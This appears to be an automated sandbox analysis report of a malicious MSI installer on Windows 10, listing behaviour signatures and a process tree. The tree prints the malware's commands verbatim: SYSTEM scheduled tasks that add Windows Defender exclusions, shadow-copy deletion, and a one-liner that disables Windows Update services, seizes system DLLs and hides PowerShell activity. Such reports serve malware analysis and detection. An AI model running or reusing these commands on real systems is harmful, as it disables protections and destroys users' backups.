Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20260513-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20260513-enlocale:en-usos:windows10-2004-x64systemwindows
  • submitted
    04/08/2026, 04:38

General

  • Target
    setup_n0c012.msi
  • Size 9.6MB
  • Sample260804-e9g7dsv1at
  • SHA256 c50a0584fa6cf525593e7d094a4333f9d83388c2344f079a4282ff557e598a47
  • MD5 SHA1 SHA512 SSDEEP TLSH

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 14 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Drops file in Drivers directory 1 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Possible privilege escalation attempt 23 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Disables service(s) 3 TTPs
  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 6 IoCs
  • Modifies file permissions 1 TTPs 23 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Badlisted process makes network request 6 IoCs

    Network request originating from process or tool commonly abused by malware.

  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: Clear Persistence 1 TTPs 10 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

  • Drops file in System32 directory 7 IoCs
  • Drops file in Program Files directory 18 IoCs
  • Drops file in Windows directory 9 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
  • Event Triggered Execution: Screensaver 1 TTPs 3 IoCs

    Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.

  • Executes a command shell one-liner 1 TTPs 26 IoCs

    Execution of a cmd.exe one-liner (/c "close" or /k "keep") is a common script/loader stage.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Control Panel 4 IoCs
  • Modifies data under HKEY_USERS 9 IoCs
  • Modifies registry class 23 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\setup_n0c012.msi
    1⤵
    • Enumerates connected drives
    • Event Triggered Execution: Installer Packages
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:2364
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1916
    • C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4468
    • C:\Windows\System32\MsiExec.exe
      C:\Windows\System32\MsiExec.exe -Embedding 6753834FEFB0ED5D1A760B69C37194D0 E Global\MSI0000
      2⤵
      • Loads dropped DLL
      • Badlisted process makes network request
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      PID:3748
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious use of AdjustPrivilegeToken
    PID:3684
  • C:\Users\Public\kSgKwa\sPEr0B.exe
    C:\Users\Public\kSgKwa\sPEr0B.exe
    1⤵
    • Checks computer location settings
    • Executes dropped EXE
    • Loads dropped DLL
    • Adds Run key to start application
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:4200
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\kSgKwa\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
      2⤵
      • Indicator Removal: Clear Persistence
      • Suspicious use of WriteProcessMemory
      PID:4968
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\kSgKwa\" /t REG_DWORD /d 0 /f"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:4892
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Run /TN "Task1"
        3⤵
          PID:4696
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Delete /TN "Task1" /F
          3⤵
            PID:1272
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
          2⤵
          • Indicator Removal: Clear Persistence
          • Suspicious use of WriteProcessMemory
          PID:1204
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
            3⤵
            • Scheduled Task/Job: Scheduled Task
            PID:2276
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Run /TN "Task1"
            3⤵
              PID:1880
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Delete /TN "Task1" /F
              3⤵
                PID:2172
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
              2⤵
              • Indicator Removal: Clear Persistence
              • Suspicious use of WriteProcessMemory
              PID:3016
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                3⤵
                • Scheduled Task/Job: Scheduled Task
                PID:2760
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Run /TN "Task1"
                3⤵
                  PID:1528
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Delete /TN "Task1" /F
                  3⤵
                    PID:4568
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                  2⤵
                  • Indicator Removal: Clear Persistence
                  • Suspicious use of WriteProcessMemory
                  PID:880
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                    3⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:4676
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Run /TN "Task1"
                    3⤵
                      PID:1832
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Delete /TN "Task1" /F
                      3⤵
                        PID:2452
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                      2⤵
                      • Indicator Removal: Clear Persistence
                      • Suspicious use of WriteProcessMemory
                      PID:1424
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Admin\Documents\" /t REG_DWORD /d 0 /f"
                        3⤵
                        • Scheduled Task/Job: Scheduled Task
                        PID:4052
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Run /TN "Task1"
                        3⤵
                          PID:2500
                        • C:\Windows\system32\schtasks.exe
                          SCHTASKS /Delete /TN "Task1" /F
                          3⤵
                            PID:4084
                        • C:\Program Files (x86)\bMy1um\bMy1um.exe
                          "C:\Program Files (x86)\bMy1um\bMy1um.exe"
                          2⤵
                          • UAC bypass
                          • Drops file in Drivers directory
                          • Checks computer location settings
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Adds Run key to start application
                          • Drops file in Program Files directory
                          • Event Triggered Execution: Screensaver
                          • System Location Discovery: System Language Discovery
                          • Checks processor information in registry
                          • Modifies Control Panel
                          • Suspicious use of WriteProcessMemory
                          • System policy modification
                          PID:4932
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c vssadmin delete shadows /all /quiet
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:1072
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\bMy1um" /inheritance:r
                            3⤵
                            • Executes a command shell one-liner
                            • Suspicious use of WriteProcessMemory
                            PID:2068
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\bMy1um" /inheritance:r
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:844
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:2952
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:2916
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" cmd.exe /q /c "@echo off & (for %i in (wuauserv UsoSvc uhssvc WaaSMedicSvc) do ( net stop %i >nul 2>&1 & sc config %i start= disabled >nul 2>&1 & sc failure %i reset= 0 actions= "" >nul 2>&1 )) & (for %i in (WaaSMedicSvc wuaueng) do ( takeown /f C:\Windows\System32\%i.dll >nul 2>&1 & icacls C:\Windows\System32\%i.dll /grant *S-1-1-0:F >nul 2>&1 & rename C:\Windows\System32\%i.dll %i_BAK.dll >nul 2>&1 & icacls C:\Windows\System32\%i_BAK.dll /setowner "NT SERVICE\TrustedInstaller" >nul 2>&1 & icacls C:\Windows\System32\%i_BAK.dll /remove *S-1-1-0 >nul 2>&1 )) & reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f >nul 2>&1 & reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f >nul 2>&1 & reg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f >nul 2>&1 & erase /f /s /q c:\windows\softwaredistribution\*.* >nul 2>&1 & rmdir /s /q c:\windows\softwaredistribution >nul 2>&1 & powershell -NoProfile -WindowStyle Hidden -Command "& {Get-ScheduledTask -TaskPath '\Microsoft\Windows\InstallService\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateOrchestrator\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateAssistant\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WaaSMedic\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue;}" >nul 2>&1"
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:176
                            • C:\Windows\SysWOW64\net.exe
                              net stop wuauserv
                              4⤵
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of WriteProcessMemory
                              PID:3512
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop wuauserv
                                5⤵
                                • System Location Discovery: System Language Discovery
                                PID:4964
                            • C:\Windows\SysWOW64\sc.exe
                              sc config wuauserv start= disabled
                              4⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:5004
                            • C:\Windows\SysWOW64\sc.exe
                              sc failure wuauserv reset= 0 actions= ""
                              4⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:800
                            • C:\Windows\SysWOW64\net.exe
                              net stop UsoSvc
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:1832
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop UsoSvc
                                5⤵
                                • System Location Discovery: System Language Discovery
                                PID:3788
                            • C:\Windows\SysWOW64\sc.exe
                              sc config UsoSvc start= disabled
                              4⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:4656
                            • C:\Windows\SysWOW64\sc.exe
                              sc failure UsoSvc reset= 0 actions= ""
                              4⤵
                              • Launches sc.exe
                              PID:848
                            • C:\Windows\SysWOW64\net.exe
                              net stop uhssvc
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:2316
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop uhssvc
                                5⤵
                                • System Location Discovery: System Language Discovery
                                PID:4764
                            • C:\Windows\SysWOW64\sc.exe
                              sc config uhssvc start= disabled
                              4⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:3876
                            • C:\Windows\SysWOW64\sc.exe
                              sc failure uhssvc reset= 0 actions= ""
                              4⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:2224
                            • C:\Windows\SysWOW64\net.exe
                              net stop WaaSMedicSvc
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:208
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop WaaSMedicSvc
                                5⤵
                                  PID:1952
                              • C:\Windows\SysWOW64\sc.exe
                                sc config WaaSMedicSvc start= disabled
                                4⤵
                                • Launches sc.exe
                                PID:1428
                              • C:\Windows\SysWOW64\sc.exe
                                sc failure WaaSMedicSvc reset= 0 actions= ""
                                4⤵
                                • Launches sc.exe
                                • System Location Discovery: System Language Discovery
                                PID:3700
                              • C:\Windows\SysWOW64\takeown.exe
                                takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                4⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                • System Location Discovery: System Language Discovery
                                PID:4524
                              • C:\Windows\SysWOW64\icacls.exe
                                icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F
                                4⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                • System Location Discovery: System Language Discovery
                                PID:2960
                              • C:\Windows\SysWOW64\icacls.exe
                                icacls C:\Windows\System32\WaaSMedicSvc_BAK.dll /setowner "NT SERVICE\TrustedInstaller"
                                4⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                • System Location Discovery: System Language Discovery
                                PID:1636
                              • C:\Windows\SysWOW64\icacls.exe
                                icacls C:\Windows\System32\WaaSMedicSvc_BAK.dll /remove *S-1-1-0
                                4⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                • System Location Discovery: System Language Discovery
                                PID:2352
                              • C:\Windows\SysWOW64\takeown.exe
                                takeown /f C:\Windows\System32\wuaueng.dll
                                4⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                • System Location Discovery: System Language Discovery
                                PID:3484
                              • C:\Windows\SysWOW64\icacls.exe
                                icacls C:\Windows\System32\wuaueng.dll /grant *S-1-1-0:F
                                4⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                PID:4528
                              • C:\Windows\SysWOW64\icacls.exe
                                icacls C:\Windows\System32\wuaueng_BAK.dll /setowner "NT SERVICE\TrustedInstaller"
                                4⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                • System Location Discovery: System Language Discovery
                                PID:4180
                              • C:\Windows\SysWOW64\icacls.exe
                                icacls C:\Windows\System32\wuaueng_BAK.dll /remove *S-1-1-0
                                4⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                • System Location Discovery: System Language Discovery
                                PID:3332
                              • C:\Windows\SysWOW64\reg.exe
                                reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
                                4⤵
                                • System Location Discovery: System Language Discovery
                                PID:1036
                              • C:\Windows\SysWOW64\reg.exe
                                reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
                                4⤵
                                  PID:5004
                                • C:\Windows\SysWOW64\reg.exe
                                  reg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:4300
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -NoProfile -WindowStyle Hidden -Command "& {Get-ScheduledTask -TaskPath '\Microsoft\Windows\InstallService\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateOrchestrator\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateAssistant\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WaaSMedic\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue;}"
                                  4⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • System Location Discovery: System Language Discovery
                                  PID:372
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\bMy1um\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                3⤵
                                • Indicator Removal: Clear Persistence
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of WriteProcessMemory
                                PID:4244
                                • C:\Windows\SysWOW64\schtasks.exe
                                  SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\bMy1um\" /t REG_DWORD /d 0 /f"
                                  4⤵
                                  • Scheduled Task/Job: Scheduled Task
                                  PID:2520
                                • C:\Windows\SysWOW64\schtasks.exe
                                  SCHTASKS /Run /TN "Task1"
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:2224
                                • C:\Windows\SysWOW64\schtasks.exe
                                  SCHTASKS /Delete /TN "Task1" /F
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:1460
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /c icacls "C:\Program Files (x86)\bMy1um" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                3⤵
                                • Executes a command shell one-liner
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of WriteProcessMemory
                                PID:4872
                                • C:\Windows\SysWOW64\icacls.exe
                                  icacls "C:\Program Files (x86)\bMy1um" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  • System Location Discovery: System Language Discovery
                                  PID:1312
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                3⤵
                                • Indicator Removal: Clear Persistence
                                • Suspicious use of WriteProcessMemory
                                PID:2248
                                • C:\Windows\SysWOW64\schtasks.exe
                                  SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  • Scheduled Task/Job: Scheduled Task
                                  PID:4740
                                • C:\Windows\SysWOW64\schtasks.exe
                                  SCHTASKS /Run /TN "Task1"
                                  4⤵
                                    PID:4228
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    SCHTASKS /Delete /TN "Task1" /F
                                    4⤵
                                      PID:4372
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /c icacls "C:\Program Files (x86)\bMy1um" /grant:r Users:(OI)(CI)(RX) /deny Users:(OI)(CI)(DC)
                                    3⤵
                                    • Executes a command shell one-liner
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious use of WriteProcessMemory
                                    PID:3780
                                    • C:\Windows\SysWOW64\icacls.exe
                                      icacls "C:\Program Files (x86)\bMy1um" /grant:r Users:(OI)(CI)(RX) /deny Users:(OI)(CI)(DC)
                                      4⤵
                                      • Possible privilege escalation attempt
                                      • Modifies file permissions
                                      • System Location Discovery: System Language Discovery
                                      PID:2256
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                    3⤵
                                    • Indicator Removal: Clear Persistence
                                    • Suspicious use of WriteProcessMemory
                                    PID:5108
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:1684
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      SCHTASKS /Run /TN "Task1"
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:5048
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      SCHTASKS /Delete /TN "Task1" /F
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:4616
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /c icacls "C:\Program Files (x86)\bMy1um\bMy1um.exe" /inheritance:r
                                    3⤵
                                    • Executes a command shell one-liner
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious use of WriteProcessMemory
                                    PID:4368
                                    • C:\Windows\SysWOW64\icacls.exe
                                      icacls "C:\Program Files (x86)\bMy1um\bMy1um.exe" /inheritance:r
                                      4⤵
                                      • Possible privilege escalation attempt
                                      • Modifies file permissions
                                      • System Location Discovery: System Language Discovery
                                      PID:3336
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                    3⤵
                                    • Indicator Removal: Clear Persistence
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious use of WriteProcessMemory
                                    PID:1656
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                                      4⤵
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:1176
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      SCHTASKS /Run /TN "Task1"
                                      4⤵
                                        PID:4204
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        SCHTASKS /Delete /TN "Task1" /F
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:3500
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /c icacls "C:\Program Files (x86)\bMy1um\bMy1um.exe" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                      3⤵
                                      • Executes a command shell one-liner
                                      • Suspicious use of WriteProcessMemory
                                      PID:4384
                                      • C:\Windows\SysWOW64\icacls.exe
                                        icacls "C:\Program Files (x86)\bMy1um\bMy1um.exe" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                        4⤵
                                        • Possible privilege escalation attempt
                                        • Modifies file permissions
                                        • System Location Discovery: System Language Discovery
                                        PID:5040
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /c icacls "C:\Program Files (x86)\bMy1um\bMy1um.exe" /grant:r Users:(RX) /deny Users:(DE)
                                      3⤵
                                      • Executes a command shell one-liner
                                      • Suspicious use of WriteProcessMemory
                                      PID:5036
                                      • C:\Windows\SysWOW64\icacls.exe
                                        icacls "C:\Program Files (x86)\bMy1um\bMy1um.exe" /grant:r Users:(RX) /deny Users:(DE)
                                        4⤵
                                        • Possible privilege escalation attempt
                                        • Modifies file permissions
                                        • System Location Discovery: System Language Discovery
                                        PID:2860
                                    • C:\Windows\SysWOW64\cmd.exe
